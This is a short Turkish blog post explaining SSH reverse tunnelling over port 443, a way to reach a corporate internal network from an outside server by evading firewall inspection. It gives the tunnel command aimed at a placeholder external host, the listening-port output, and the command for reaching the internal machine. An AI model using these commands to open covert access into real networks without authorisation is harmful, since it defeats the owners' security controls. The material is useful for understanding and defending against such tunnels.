Kurum ağı dışarısında bulunan bir sunucuya (SSH, VPN, DNS vb.) erişim gerçekleştirilmesi ile açık tutulan bu bağlantı üzerinden, kurum iç ağına erişim gerçekleştirilebilmesi mümkündür. En sıkça başvurulan yöntemlerden biri olan SSH Reverse Tunnelling yöntemide bunlardan biridir.

Yukarıdaki şekilde de ifade edilmeye çalışıldığı üzere normal şartlar altında sağ tarafta bulunan bir istemci sol tarafta tasvir edilen güvenlik duvarı arkasındaki kurum ağı içerisindeki istemcilere erişememektedir. Bunu aşmak için kurum içerisindeki bir istemci, dışarıda SSH sunucuya ters tünel özellikli bağlantı kurabilir. Böylelikle bir şekilde dışarıdaki bu sunucuya erişen herhangi birinin kolaylıkla kurum iç ağına erişmesi mümkün kılınabilir.
Genellikle kurum ağlarından dışarı yönlü https (443/tcp) portu üzerinden kurulan bağlantılar herhangi bir denetime tabi tutulmadığı için aşağıdaki örnekte internet üzerinde yer alan ve 443/tcp üzerinden hizmet veren bir SSH sunucu baz kullanılmıştır. SSH ile ters tünel açmak için kurum ağındaki bir istemci üzerinde aşağıdaki gibi bir komut çalıştırılabilir:

# ssh -p 443 -f -g -N  -R2222:localhost:22  kullanıcı_adı@DIS_SSH_SUNUCU

Bu komut aracılığı ile kurulan tünel içerisinden DIS_SSH_SUNUCU’nun 2222/tcp portu üzerinden yerel ağ içerisinde bulunan kullanıcı bilgisayarına erişim sağlanabilmektedir. SSH sunucu üzerindeki durum şu şekilde olmaktadır:

# netstat -nlput | grep "2222"
tcp        0      0 127.0.0.1:2222              0.0.0.0:*             LISTEN      12542/sshd: kullanıcı_adı

SSH sunucunun 2222/tcp portu üzerinden kurum yerel alan ağındaki SSH servisi etkin istemcinin 22/tcp portuna erişim sağlanabilmektedir. Bunun için dış ağdaki SSH sunucu üzerinde şu komutun girilmesi yeterlidir:

# ssh localhost -p 2222

Bu komutun sonrasında iç ağdaki istemci üzerindeki SSH servisine dair kullanıcı adı ve parola belirtilmesinin ardından istemcinin erişim yetkisinin olduğu yerel ağdaki bütün kaynaklara erişim sağlanabilmektedir.

0 comments:

Post a Comment

 
Top